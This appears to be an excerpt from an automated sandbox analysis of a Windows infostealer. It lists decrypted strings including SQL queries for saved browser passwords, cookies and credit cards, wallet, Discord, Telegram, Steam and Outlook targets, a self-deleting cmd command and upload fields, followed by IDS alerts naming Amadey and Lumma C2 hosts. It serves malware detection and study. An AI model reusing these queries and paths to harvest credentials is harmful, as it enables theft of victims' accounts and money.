                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: BCryptSetProperty
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: BCryptDestroyKey
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: BCryptOpenAlgorithmProvider
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetWindowRect
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetDesktopWindow
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetDC
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: CloseWindow
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: wsprintfA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: EnumDisplayDevicesA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetKeyboardLayoutList
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: CharToOemW
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: wsprintfW
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: RegQueryValueExA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: RegEnumKeyExA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: RegOpenKeyExA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: RegCloseKey
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: RegEnumValueA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: CryptBinaryToStringA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: CryptUnprotectData
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: SHGetFolderPathA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: ShellExecuteExA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: InternetOpenUrlA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: InternetConnectA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: InternetCloseHandle
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: InternetOpenA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: HttpSendRequestA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: HttpOpenRequestA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: InternetReadFile
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: InternetCrackUrlA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: StrCmpCA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: StrStrA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: StrCmpCW
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: PathMatchSpecA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetModuleFileNameExA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: RmStartSession
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: RmRegisterResources
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: RmGetList
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: RmEndSession
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: sqlite3_open
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: sqlite3_prepare_v2
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: sqlite3_step
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: sqlite3_column_text
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: sqlite3_finalize
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: sqlite3_close
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: sqlite3_column_bytes
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: sqlite3_column_blob
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: encrypted_key
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: PATH
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: C:\ProgramData\nss3.dll
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: NSS_Init
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: NSS_Shutdown
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: PK11_GetInternalKeySlot
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: PK11_FreeSlot
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: PK11_Authenticate
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: PK11SDR_Decrypt
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: C:\ProgramData\
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: browser:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: profile:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: url:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: login:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: password:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Opera
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: OperaGX
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Network
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: cookies
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: .txt
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: TRUE
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: FALSE
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: autofill
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: SELECT name, value FROM autofill
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: history
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: cc
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: name:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: month:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: year:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: card:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Cookies
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Login Data
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Web Data
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: History
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: logins.json
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: formSubmitURL
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: usernameField
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: encryptedUsername
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: encryptedPassword
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: guid
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: cookies.sqlite
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: formhistory.sqlite
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: places.sqlite
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: plugins
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Local Extension Settings
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Sync Extension Settings
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: IndexedDB
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Opera Stable
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Opera GX Stable
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: CURRENT
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: chrome-extension_
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: _0.indexeddb.leveldb
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Local State
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: profiles.ini
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: chrome
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: opera
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: firefox
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: wallets
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: %08lX%04lX%lu
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: ProductName
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: x32
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: x64
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: %d/%d/%d %d:%d:%d
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: ProcessorNameString
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: DisplayName
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: DisplayVersion
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Network Info:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: - IP: IP?
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: - Country: ISO?
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: System Summary:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: - HWID:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: - OS:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: - Architecture:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: - UserName:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: - Computer Name:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: - Local Time:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: - UTC:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: - Language:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: - Keyboards:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: - Laptop:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: - Running Path:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: - CPU:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: - Threads:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: - Cores:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: - RAM:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: - Display Resolution:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: - GPU:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: User Agents:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Installed Apps:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: All Users:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Current User:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Process List:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: system_info.txt
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: freebl3.dll
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: mozglue.dll
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: msvcp140.dll
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: nss3.dll
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: softokn3.dll
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: vcruntime140.dll
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: \Temp\
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: .exe
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: runas
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: open
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: /c start
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: %DESKTOP%
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: %APPDATA%
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: %LOCALAPPDATA%
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: %USERPROFILE%
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: %DOCUMENTS%
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: %PROGRAMFILES%
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: %PROGRAMFILES_86%
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: %RECENT%
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: *.lnk
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: files
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: \discord\
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: \Local Storage\leveldb\CURRENT
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: \Local Storage\leveldb
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: \Telegram Desktop\
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: key_datas
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: D877F783D5D3EF8C*
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: map*
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: A7FDF864FBC10B77*
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: A92DAA6EA6F891F2*
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: F8806DD0C461824F*
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Telegram
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Tox
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: *.tox
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: *.ini
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Password
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: 00000001
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: 00000002
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: 00000003
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: 00000004
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: \Outlook\accounts.txt
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Pidgin
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: \.purple\
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: accounts.xml
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: dQw4w9WgXcQ
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: token:
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Software\Valve\Steam
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: SteamPath
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: \config\
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: ssfn*
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: config.vdf
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: DialogConfig.vdf
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: DialogConfigOverlay*.vdf
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: libraryfolders.vdf
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: loginusers.vdf
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: \Steam\
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: sqlite3.dll
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: browsers
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: done
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: soft
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: \Discord\tokens.txt
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: https
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: POST
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: HTTP/1.1
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Content-Disposition: form-data; name="
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: hwid
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: build
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: token
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: file_name
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: file
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: message
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: screenshot.jpg
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:63716 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63854 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63867 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63873 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63884 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63896 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63909 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63923 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63970 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:64022 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:64023 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:64029 version: TLS 1.2
                          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: MSBuild.exe, 00000012.00000002.2960053340.0000000005530000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\exe\MSBuild.pdbo source: MSBuild.exe, 00000012.00000002.2927279861.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: MSBuild.exe, 00000012.00000002.2960053340.0000000005530000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: my_library.pdb source: 0d8313073f.exe, 0000000D.00000003.2559813189.000000000533B000.00000004.00001000.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000002.2983236159.000000006C191000.00000002.00000001.01000000.0000001A.sdmp, 0d8313073f.exe, 0000000D.00000002.2922718430.000000000063C000.00000040.00000001.01000000.0000000D.sdmp
                          Source: Binary string: n0C:\Windows\MSBuild.pdb source: MSBuild.exe, 00000012.00000002.2924990669.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: Plofgcjnqfn.pdb source: MSBuild.exe, 00000012.00000002.2945809571.0000000004043000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.2945809571.0000000003D5C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.2956645688.00000000051F0000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000012.00000002.2942794454.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Fwkdsz.exe, 00000007.00000002.2694689971.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: oC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdb source: MSBuild.exe, 00000012.00000002.2924990669.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Fwkdsz.exe, 00000007.00000002.2694689971.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: protobuf-net.pdbSHA256}Lq source: Fwkdsz.exe, 00000007.00000002.2703552750.0000000006A60000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\MSBuild.pdb source: MSBuild.exe, 00000012.00000002.2927279861.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\Windows\MSBuild.pdbpdbild.pdb source: MSBuild.exe, 00000012.00000002.2960053340.0000000005530000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: protobuf-net.pdb source: Fwkdsz.exe, 00000007.00000002.2703552750.0000000006A60000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdb source: MSBuild.exe, 00000012.00000002.2927279861.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: symbols\exe\MSBuild.pdb source: MSBuild.exe, 00000012.00000002.2924990669.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: o.pdb source: MSBuild.exe, 00000012.00000002.2924990669.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: Plofgcjnqfn.pdbx source: MSBuild.exe, 00000012.00000002.2945809571.0000000004043000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.2945809571.0000000003D5C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.2956645688.00000000051F0000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000012.00000002.2942794454.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\dll\System.pdb source: MSBuild.exe, 00000012.00000002.2927279861.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: my_library.pdbU source: 0d8313073f.exe, 0000000D.00000003.2559813189.000000000533B000.00000004.00001000.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000002.2983236159.000000006C191000.00000002.00000001.01000000.0000001A.sdmp, 0d8313073f.exe, 0000000D.00000002.2922718430.000000000063C000.00000040.00000001.01000000.0000000D.sdmp
                          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: MSBuild.exe, 00000012.00000002.2927279861.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.PDBs source: MSBuild.exe, 00000012.00000002.2927279861.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\System.pdbC source: MSBuild.exe, 00000012.00000002.2927279861.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: MSBuild.exe, 00000012.00000002.2927279861.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.2924990669.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdb source: MSBuild.exe, 00000012.00000002.2927279861.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                          Source: chrome.exeMemory has grown: Private usage: 1MB later: 35MB
                          Source: firefox.exeMemory has grown: Private usage: 1MB later: 185MB

                          Networking

                          barindex
                          Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:63773 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:63787
                          Source: Network trafficSuricata IDS: 2856121 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M2 : 192.168.2.4:63813 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.4:56371 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.4:55265 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.4:50868 -> 1.1.1.1:53
